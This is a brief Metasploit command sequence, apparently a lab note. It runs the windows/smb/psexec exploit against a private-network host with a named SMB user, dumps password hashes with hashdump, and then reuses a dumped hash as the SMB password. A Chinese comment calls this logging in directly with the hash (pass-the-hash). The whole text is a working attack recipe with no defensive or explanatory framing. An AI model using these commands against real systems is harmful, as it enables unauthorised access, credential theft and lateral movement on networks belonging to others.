use exploit/windows/smb/psexec
set RHOST 192.168.48.129
set SMBUSER wing
exploit
hashdump
exit
set smbpass <哈希值>
//直接用哈希值登陆